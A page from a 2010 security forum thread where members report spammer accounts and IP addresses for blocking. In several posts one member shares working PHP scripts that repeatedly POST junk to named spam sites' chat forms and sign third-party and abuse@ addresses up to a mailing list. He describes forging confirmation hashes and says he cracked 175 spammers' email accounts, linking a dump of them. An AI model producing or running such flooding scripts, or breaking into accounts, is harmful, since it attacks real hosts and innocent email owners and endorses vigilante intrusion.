Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous123Next
Current Page: 2 of 3
Re: List of spammers
Posted by: Skyphire
Date: June 19, 2010 11:45AM

Let's add them to their own spam-list:

<?php

set_time_limit(0);

function spamback2() {

$spammers = array('Caesarol@hotmail.com','www.gucci3.com@163.com','sellguccibag@hotmail.com');

$url = 'http://www.caesarol.us/user.php?act=email_list&job=add&email='.$spammers[rand(0,2)];

$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 0);

curl_exec($ch);


curl_close($ch);

}
$j=0;
for($i=0;$i<12;$i++) {
	spamback2();
	$j++;
}

if($j >=11) {
sleep(2);
echo "ok";
echo "<script>document.location=location.href;</script>";
}

?>

Or:

Here's how we solve that SPAM:


<?php


function spamback() {

$url = 'http://www.onmyperfectwatches.net/livechat.html';
$fields = array(
	'Name'=>"LULZ spammer ".mt_rand(0,0xfffff)."",
	'Email'=>"LULZ spammer ".mt_rand(0,0xfffff)."",
	'Content'=>"LULZ ".mt_rand(0,0xfffff)."",
	'mail_friend'=>"1",
	'Submit'=>"Submit"
);

foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string,'&');

$ch = curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_POST,count($fields));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 0);
curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);

curl_exec($ch);
curl_close($ch);

}


$j=0;
for($i=0;$i<11;$i++) {
echo "<!-- ";
spamback();
echo " -->";
$j++;
}

if($j > 9) {
sleep(2);
echo "ok";
echo "<script>document.location=location.href;</script>";
}


?>



Edited 2 time(s). Last edit at 06/19/2010 12:36PM by Skyphire.

Options: ReplyQuote
Re: List of spammers
Posted by: Skyphire
Date: June 19, 2010 12:25PM

We could compute the confirmation hashes too, because they use this:

$hash = substr(md5(time()),1,10);

url:

act=email_list&job=add_check&hash=$hash&email=$email

Then it's easy to built a small matrix for 1-3 seconds and push them back. Silly security.

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: June 20, 2010 04:57AM

Another spammer:-
Posted by: weifeng (216.53.32.59.broad.mz.gd.dynamic.163data.com.cn)

He has posts everywhere, ID can you remove his posts I'd do it myself but there are a lot and I'd just get banned for writing a script.

@Skyphire

Hahahahhahahaah sweet :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of spammers
Posted by: Anonymous User
Date: June 20, 2010 04:05PM

@Skyphire nice indeed :)

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: June 21, 2010 02:59AM

Posted by: angelina (ABTS-TN-dynamic-248.100.174.122.airtelbroadband.in)
Posted by: weifeng (41.10.135.219.broad.mm.gd.dynamic.163data.com.cn)
Posted by: elin319 (111.172.108.15)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 06/21/2010 09:53AM by Gareth Heyes.

Options: ReplyQuote
Re: List of spammers
Posted by: id
Date: June 21, 2010 02:35PM

sorry, was trying to not look at the internets this weekend! added them

-id

Options: ReplyQuote
Re: List of spammers
Posted by: Skyphire
Date: June 21, 2010 04:10PM

Updated stable release (; and more cross domain spammy. Next release will have proxy support. LOL just messing around eh.

<?php

set_time_limit(0);
echo mt_rand(0,0xfffff);

function spamback() {

// cross domain
$uries = array('http://www.onmyperfectwatches.net/livechat.html','http://www.caesarol.com/livechat.html','http://www.gucci3.com/livechat.html');

$fields = array(
	'Name'=>"LULZ spammer ".mt_rand(0,0xfffff)."",
	'Email'=>"LULZ spammer ".mt_rand(0,0xfffff)."",
	'Content'=>"LULZ ".mt_rand(0,0xfffff)."",
	'mail_friend'=>"1",
	'Submit'=>"Submit"
);

foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string,'&');

$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$uries[rand(0,2)]);
curl_setopt($ch,CURLOPT_POST,count($fields));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 0);
curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
curl_exec($ch);
curl_close($ch);
}


$j=0;
for($i=0;$i<455;$i++) {
echo "<!-- ";
spamback();
echo " -->";
$j++;
}

if($j >=453) {
sleep(1);
echo "ok";
echo "<script>document.location=location.href;</script>";
}

?>

Part II:

<?php

set_time_limit(0);

function spamback2() {

// with easter egg.
$spammers = array('Caesarol@hotmail.com','www.gucci3.com@163.com','sellguccibag@hotmail.com','english@mail.gov.cn');

$url = 'http://www.caesarol.us/user.php?act=email_list&job=add&email='.$spammers[rand(0,3)];

$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 0);
curl_exec($ch);
curl_close($ch);
}

$j=0;
for($i=0;$i<455;$i++) {
	spamback2();
	$j++;
}

if($j >=453) {
sleep(2);
echo "ok";
echo "<script>document.location=location.href;</script>";
}

?>

Runs for 2 days now. Maybe I write a CLI one and put it in my cron. ^.^



Edited 5 time(s). Last edit at 06/21/2010 04:26PM by Skyphire.

Options: ReplyQuote
Re: List of spammers
Posted by: Albino
Date: June 21, 2010 05:00PM

Haha nice. Especially the easter egg. How soon until they blacklist your IP address though... I guess that's where making the code public comes in useful.

Options: ReplyQuote
Re: List of spammers
Posted by: Skyphire
Date: June 22, 2010 09:48AM

updated array:

$spammers = array('Caesarol@hotmail.com','www.gucci3.com@163.com','sellguccibag@hotmail.com','bayouboy5668@aol.com','abuse@163.com','abuse@godaddy.com','abuse@anti-spam.cn');

Let's see how long that domain stays online. ^.^

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: June 30, 2010 06:14AM

Posted by: stevejonathan10 (121.246.81.202.static-ahmedabad.vsnl.net.in)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of spammers
Posted by: id
Date: June 30, 2010 11:46AM

Why do network operators suck at doing in-addr.arpa records correctly?

added

-id

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: July 12, 2010 09:27AM

Posted by: angelina (ABTS-TN-dynamic-001.178.174.122.airtelbroadband.in)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of spammers
Posted by: id
Date: July 12, 2010 10:06AM

That looks like a gateway, not sure if I want to block all of their customers.

-id

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: July 13, 2010 06:53AM

I just delete and post
proximityinfotech6 (ABTS-North-Static-107.45.176.122.airtelbroadband.in)
Posted by: tommy96 (wtl.worldcall.net.pk)

You should have CAPTCHAS or something on reg

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of spammers
Posted by: Skyphire
Date: July 14, 2010 09:13AM

@Gareth

I run a dating website as you might know, and put up CAPTCHA'S but they just type them over. Then I limited a maximum of sending 10 messages a day, but guess what: they don't care. I got some low level AI that detects sp4mmers, and deletes them based upon signatures, but they keep on creating accounts. It seems the more locks you put on it, the more they seems post. So in the end I start cracking their email-boxes (175 in total) after that, they still continued to sp4m, although a bit less as I cracked a couple of 'main' accounts where 'work' was delegated from. To my amazement, they have people sitting behind a cheap ass PC and getting the instruction to 'throw 3 or 5 a day' So little, seems enough. Notoriously crazy people.

Here is a small dump of their email accounts: http://www.skyphire.nl/phun/images/419.rar



Edited 3 time(s). Last edit at 07/14/2010 09:14AM by Skyphire.

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: July 14, 2010 09:51AM

@Skyphire

Interesting if these are real people and not bots maybe we can figure out a way to make it not worth their time. If we can somehow delay users when they enter a comment then maybe we'll eliminate manual spam

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: July 15, 2010 02:24AM

Posted by: proximityinfotech6 (ABTS-North-Static-107.45.176.122.airtelbroadband.in)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of spammers
Posted by: Anonymous User
Date: July 15, 2010 02:43AM

felix91 (46.211.205.121.broad.pt.fj.dynamic.163data.com.cn)

Options: ReplyQuote
Re: List of spammers
Posted by: id
Date: July 15, 2010 11:47AM

both blocked

-id

Options: ReplyQuote
Re: List of spammers
Posted by: Anonymous User
Date: July 16, 2010 02:37AM

Johnkitty (202.78.224.125)

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: July 16, 2010 03:54AM

Posted by: yiqianchi (120.39.65.188)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of spammers
Posted by: id
Date: July 16, 2010 12:11PM

done

-id

Options: ReplyQuote
Re: List of spammers
Posted by: thrill
Date: July 17, 2010 02:47AM

yiqianchi (222.187.32.120.board.xm.fj.dynamic.163data.com.cn)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: July 19, 2010 02:54AM

Posted by: yiqianchi (160.185.32.120.board.xm.fj.dynamic.163data.com.cn)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of spammers
Posted by: id
Date: July 19, 2010 01:28PM

Locked the account.

Seems to be a lot more spam lately, I'll ping rsnake about doing something to slow it.

-id

Options: ReplyQuote
Re: List of spammers
Posted by: thrill
Date: July 19, 2010 03:11PM

I say let's block all of china ala old fashioned pilot way.. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill



Edited 1 time(s). Last edit at 07/19/2010 03:12PM by thrill.

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: July 19, 2010 03:43PM

Here's some more spammers I've collected attacking wordpress:-
'91.201.66.6','220.250.1.3','95.211.27.210','59.58.190.166','194.44.171.14','58.22.68.147',
'81.92.204.1','201.16.248.154','200.141.207.2','84.204.14.14','213.83.63.50','216.134.194.36',
'211.14.18.62','195.238.236.4','66.35.250.15','217.30.180.53','195.188.89.200','64.241.37.140',
'200.89.188.195','66.80.248.146','88.56.223.100','202.108.11.106','207.67.117.178','207.154.21.218',
'81.241.238.103','81.241.238.103','202.108.11.106','202.108.11.106','72.36.94.120','66.230.204.130',
'66.230.204.130','66.230.204.130','66.230.204.130','66.230.204.130','67.18.100.186','67.18.100.186',
'202.108.11.106','122.152.129.17','202.108.11.106','85.214.62.129','85.214.62.129','85.214.62.129',
'85.214.62.129','61.135.162.212','202.108.11.106','141.223.95.7','61.135.162.212','202.108.11.106',
'202.108.11.106','207.67.117.178','207.67.117.178','81.26.192.227','80.177.186.130','74.52.30.66','64.46.39.14'

I wonder if it's possible to find something in common, maybe using flash cookies to monitor them or profile them in some way.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: List of spammers
Posted by: Gareth Heyes
Date: August 03, 2010 01:25AM

Posted by: djstore (217-170-98-136.internetbox.cz)
Posted by: Akshay123 (117.207.113.84)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 08/09/2010 02:04AM by Gareth Heyes.

Options: ReplyQuote
Re: List of spammers
Posted by: Albino
Date: August 09, 2010 09:08AM

Has 'seri4l' sent a suspicious PM to everyone or just me?

Options: ReplyQuote
Re: List of spammers
Posted by: id
Date: August 09, 2010 10:17AM

suspicious in what way?

-id

Options: ReplyQuote
Pages: Previous123Next
Current Page: 2 of 3


Sorry, only registered users may post in this forum.